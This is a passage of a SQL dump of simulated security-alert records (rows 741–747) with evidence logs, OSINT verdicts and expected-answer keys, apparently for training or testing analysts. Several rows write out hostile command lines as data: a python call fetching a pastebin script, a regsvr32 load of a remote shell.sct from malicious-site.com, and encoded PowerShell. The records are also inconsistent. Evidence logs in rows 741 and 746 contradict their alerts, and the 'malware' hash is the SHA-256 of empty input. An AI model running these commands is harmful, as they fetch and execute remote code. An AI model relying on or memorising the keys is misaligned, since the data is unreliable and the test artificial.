hollowing\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"block_hash\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The encoded PowerShell command suggests process hollowing, a common technique for fileless malware.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc 
AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(741, 'DGA Domain Detected in Network Traffic', 'medium', 'Firewall', 'Suspicious network traffic was detected involving a domain generated by a Domain Generation Algorithm (DGA), commonly used for C2 communication.', 'Command and Control', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T14:22:11Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"203.0.113.77\",\"username\":\"jane.doe\",\"hostname\":\"LAPTOP-JDOE\",\"domain\":\"gibberish12345.biz\"}', '2026-01-09 20:43:04', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple DGA domains\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"gibberish12345.biz\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Domain matches patterns used by DGA malware\"}}],\"expected_actions\":[\"block_ip\",\"block_domain\",\"isolate_host\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"command_and_control\",\"analysis_notes\":\"The domain and associated IP are indicative of DGA-based C2 communication.\"}', 'Expert', 'NDR', 9, 1, 'GOVERNMENT', NULL, NULL, 
'{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(742, 'Failed Network Connection Attempt to Known Malicious IP', 'low', 'IDS', 'A network connection attempt was detected to an external IP previously reported for malicious activities. Further investigation revealed it was a benign service misconfiguration.', 'Network Anomaly', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T16:47:59Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"198.51.100.99\",\"username\":\"svc.account\",\"hostname\":\"SERV-01\"}', '2026-01-10 08:16:16', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the service account host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported for malicious activities but currently clean\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_anomaly\",\"analysis_notes\":\"The connection attempt to a previously malicious IP was due to a misconfigured service, resulting in a false positive.\"}', 'Expert', 'NDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.388Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T16:47:59Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"198.51.100.99\\\",\\\"username\\\":\\\"svc.account\\\",\\\"hostname\\\":\\\"SERV-01\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.388Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T16:47:59Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"198.51.100.99\\\",\\\"username\\\":\\\"svc.account\\\",\\\"hostname\\\":\\\"SERV-01\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.388Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T16:47:59Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"198.51.100.99\\\",\\\"username\\\":\\\"svc.account\\\",\\\"hostname\\\":\\\"SERV-01\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.388Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T16:47:59Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"198.51.100.99\\\",\\\"username\\\":\\\"svc.account\\\",\\\"hostname\\\":\\\"SERV-01\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.388Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T16:47:59Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"198.51.100.99\\\",\\\"username\\\":\\\"svc.account\\\",\\\"hostname\\\":\\\"SERV-01\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(743, 'Suspicious AWS Lambda Invocation Detected', 'critical', 'AWS GuardDuty', 'A Lambda function was invoked with a payload indicative of crypto mining. The function leveraged multiple legitimate services as C2 channels.', 'Malware', 'T1190', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T08:23:45Z\",\"event_type\":\"lambda_invocation\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"203.0.113.56\",\"username\":\"aws_lambda_user\",\"hostname\":\"lambda-instance-01\",\"command_line\":\"python3 -c \'import urllib; urllib.request.urlopen(\\\"https://pastebin.com/raw/abcd1234\\\")\'\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\"}', '2026-01-11 09:40:26', '2026-02-16 18:02:41', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 237 times for suspicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known crypto mining malware\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"python3 -c \'import urllib; urllib.request.urlopen(\\\"https://pastebin.com/raw/abcd1234\\\")\'\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Command uses pastebin to fetch remote scripts\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Lambda invocation detected with indicators pointing to crypto mining. 
IP and hash linked to malicious activity.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.389Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:23:45Z\\\",\\\"event_type\\\":\\\"lambda_invocation\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"203.0.113.56\\\",\\\"username\\\":\\\"aws_lambda_user\\\",\\\"hostname\\\":\\\"lambda-instance-01\\\",\\\"command_line\\\":\\\"python3 -c \'import urllib; urllib.request.urlopen(\\\\\\\"https://pastebin.com/raw/abcd1234\\\\\\\")\'\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.389Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:23:45Z\\\",\\\"event_type\\\":\\\"lambda_invocation\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"203.0.113.56\\\",\\\"username\\\":\\\"aws_lambda_user\\\",\\\"hostname\\\":\\\"lambda-instance-01\\\",\\\"command_line\\\":\\\"python3 -c \'import urllib; urllib.request.urlopen(\\\\\\\"https://pastebin.com/raw/abcd1234\\\\\\\")\'\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.389Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:23:45Z\\\",\\\"event_type\\\":\\\"lambda_invocation\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"203.0.113.56\\\",\\\"username\\\":\\\"aws_lambda_user\\\",\\\"hostname\\\":\\\"lambda-instance-01\\\",\\\"command_line\\\":\\\"python3 -c \'import urllib; 
urllib.request.urlopen(\\\\\\\"https://pastebin.com/raw/abcd1234\\\\\\\")\'\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.389Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:23:45Z\\\",\\\"event_type\\\":\\\"lambda_invocation\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"203.0.113.56\\\",\\\"username\\\":\\\"aws_lambda_user\\\",\\\"hostname\\\":\\\"lambda-instance-01\\\",\\\"command_line\\\":\\\"python3 -c \'import urllib; urllib.request.urlopen(\\\\\\\"https://pastebin.com/raw/abcd1234\\\\\\\")\'\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.389Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:23:45Z\\\",\\\"event_type\\\":\\\"lambda_invocation\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"203.0.113.56\\\",\\\"username\\\":\\\"aws_lambda_user\\\",\\\"hostname\\\":\\\"lambda-instance-01\\\",\\\"command_line\\\":\\\"python3 -c \'import urllib; urllib.request.urlopen(\\\\\\\"https://pastebin.com/raw/abcd1234\\\\\\\")\'\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(744, 'Azure AD Privilege Escalation Attempt', 'high', 'Microsoft Sentinel', 'Anomalous activity detected with Azure AD privileges being elevated using a compromised account. The activity was followed by suspicious PowerShell commands.', 'Lateral Movement', 'T1078', 1, 'investigating', 140, '{\"timestamp\":\"2026-01-11T02:15:30Z\",\"event_type\":\"privilege_escalation\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"10.0.0.5\",\"username\":\"compromised_user\",\"hostname\":\"win-server-2026\",\"command_line\":\"powershell.exe -Enc JABjAGgAbwBjAGsAZQBBAHIAZQBBAE4AYQBsAHkAcwBpAHMA\"}', '2026-01-10 15:01:29', '2026-02-24 04:20:45', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"User account potentially compromised\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell.exe -Enc JABjAGgAbwBjAGsAZQBBAHIAZQBBAE4AYQBsAHkAcwBpAHMA\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command indicative of privilege escalation\"}}],\"expected_actions\":[\"reset_credentials\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Privilege escalation detected with encoded PowerShell indicative of malicious intent.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.390Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T02:15:30Z\\\",\\\"event_type\\\":\\\"privilege_escalation\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"hostname\\\":\\\"win-server-2026\\\",\\\"command_line\\\":\\\"powershell.exe -Enc JABjAGgAbwBjAGsAZQBBAHIAZQBBAE4AYQBsAHkAcwBpAHMA\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.390Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T02:15:30Z\\\",\\\"event_type\\\":\\\"privilege_escalation\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"hostname\\\":\\\"win-server-2026\\\",\\\"command_line\\\":\\\"powershell.exe -Enc JABjAGgAbwBjAGsAZQBBAHIAZQBBAE4AYQBsAHkAcwBpAHMA\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.390Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T02:15:30Z\\\",\\\"event_type\\\":\\\"privilege_escalation\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"hostname\\\":\\\"win-server-2026\\\",\\\"command_line\\\":\\\"powershell.exe -Enc JABjAGgAbwBjAGsAZQBBAHIAZQBBAE4AYQBsAHkAcwBpAHMA\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.390Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T02:15:30Z\\\",\\\"event_type\\\":\\\"privilege_escalation\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"hostname\\\":\\\"win-server-2026\\\",\\\"command_line\\\":\\\"powershell.exe 
-Enc JABjAGgAbwBjAGsAZQBBAHIAZQBBAE4AYQBsAHkAcwBpAHMA\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.390Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T02:15:30Z\\\",\\\"event_type\\\":\\\"privilege_escalation\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"hostname\\\":\\\"win-server-2026\\\",\\\"command_line\\\":\\\"powershell.exe -Enc JABjAGgAbwBjAGsAZQBBAHIAZQBBAE4AYQBsAHkAcwBpAHMA\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(745, 'Potential Data Exfiltration via Exposed S3 Bucket', 'high', 'AWS CloudTrail', 'Sensitive data was accessed from an exposed S3 bucket by a foreign IP, suggesting data exfiltration.', 'Data Exfil', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:40:12Z\",\"event_type\":\"data_access\",\"src_ip\":\"203.0.113.77\",\"dst_ip\":\"192.0.2.44\",\"username\":\"s3_data_user\",\"hostname\":\"s3-bucket-123\",\"request_body\":\"GET /sensitive-data.csv HTTP/1.1\"}', '2026-01-10 08:53:05', '2026-03-14 14:54:05', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for unauthorized data access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"GET /sensitive-data.csv HTTP/1.1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Access to sensitive data file without authorization\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"review_bucket_permissions\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"IP involved in accessing exposed S3 bucket with sensitive data, indicative of data exfiltration.\"}', 'Expert', 'CLOUD', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.391Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:40:12Z\\\",\\\"event_type\\\":\\\"data_access\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"192.0.2.44\\\",\\\"username\\\":\\\"s3_data_user\\\",\\\"hostname\\\":\\\"s3-bucket-123\\\",\\\"request_body\\\":\\\"GET /sensitive-data.csv 
HTTP/1.1\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.391Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:40:12Z\\\",\\\"event_type\\\":\\\"data_access\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"192.0.2.44\\\",\\\"username\\\":\\\"s3_data_user\\\",\\\"hostname\\\":\\\"s3-bucket-123\\\",\\\"request_body\\\":\\\"GET /sensitive-data.csv HTTP/1.1\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.391Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:40:12Z\\\",\\\"event_type\\\":\\\"data_access\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"192.0.2.44\\\",\\\"username\\\":\\\"s3_data_user\\\",\\\"hostname\\\":\\\"s3-bucket-123\\\",\\\"request_body\\\":\\\"GET /sensitive-data.csv HTTP/1.1\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.391Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:40:12Z\\\",\\\"event_type\\\":\\\"data_access\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"192.0.2.44\\\",\\\"username\\\":\\\"s3_data_user\\\",\\\"hostname\\\":\\\"s3-bucket-123\\\",\\\"request_body\\\":\\\"GET /sensitive-data.csv HTTP/1.1\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.391Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:40:12Z\\\",\\\"event_type\\\":\\\"data_access\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"192.0.2.44\\\",\\\"username\\\":\\\"s3_data_user\\\",\\\"hostname\\\":\\\"s3-bucket-123\\\",\\\"request_body\\\":\\\"GET 
/sensitive-data.csv HTTP/1.1\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(746, 'False Positive: Legitimate User Mistaken for Brute Force Attacker', 'medium', 'Splunk', 'Multiple login failures detected from an internal IP address. Investigation revealed a legitimate user mistyping their password.', 'Credential Attack', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T13:25:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"10.0.0.25\",\"dst_ip\":\"10.0.1.15\",\"username\":\"jane.doe\",\"hostname\":\"corp-laptop-01\",\"failed_attempts\":12}', '2026-01-09 22:57:28', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address, no external threat detected\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jane.doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Legitimate corporate user\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Login failures occurred due to user error; no malicious activity detected.\"}', 'Expert', 'SIEM', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.392Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:25:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.25\\\",\\\"dst_ip\\\":\\\"10.0.1.15\\\",\\\"username\\\":\\\"jane.doe\\\",\\\"hostname\\\":\\\"corp-laptop-01\\\",\\\"failed_attempts\\\":12}\"},{\"timestamp\":\"2026-02-01T20:31:22.392Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:25:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.25\\\",\\\"dst_ip\\\":\\\"10.0.1.15\\\",\\\"username\\\":\\\"jane.doe\\\",\\\"hostname\\\":\\\"corp-laptop-01\\\",\\\"failed_attempts\\\":12}\"},{\"timestamp\":\"2026-02-01T20:30:22.392Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:25:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.25\\\",\\\"dst_ip\\\":\\\"10.0.1.15\\\",\\\"username\\\":\\\"jane.doe\\\",\\\"hostname\\\":\\\"corp-laptop-01\\\",\\\"failed_attempts\\\":12}\"},{\"timestamp\":\"2026-02-01T20:29:22.392Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:25:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.25\\\",\\\"dst_ip\\\":\\\"10.0.1.15\\\",\\\"username\\\":\\\"jane.doe\\\",\\\"hostname\\\":\\\"corp-laptop-01\\\",\\\"failed_attempts\\\":12}\"},{\"timestamp\":\"2026-02-01T20:28:22.392Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:25:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.25\\\",\\\"dst_ip\\\":\\\"10.0.1.15\\\",\\\"username\\\":\\\"jane.doe\\\",\\\"hostname\\\":\\\"corp-laptop-01\\\",\\\"failed_attempts\\\":12}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(747, 'Lateral Movement Detected Using LOLBins within Azure Environment', 'critical', 'Azure Sentinel', 'Suspicious regsvr32.exe execution detected on multiple internal hosts indicating potential lateral movement using LOLBins within Azure VMs.', 'Lateral Movement', 'T1218', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T08:45:23Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"10.0.0.8\",\"username\":\"jdoe\",\"hostname\":\"AzureVM01\",\"command_line\":\"regsvr32.exe /s /n /u /i:https://malicious-site.com/shell.sct scrobj.dll\"}', '2026-01-09 22:34:33', '2026-02-16 18:05:40', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.8\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of target 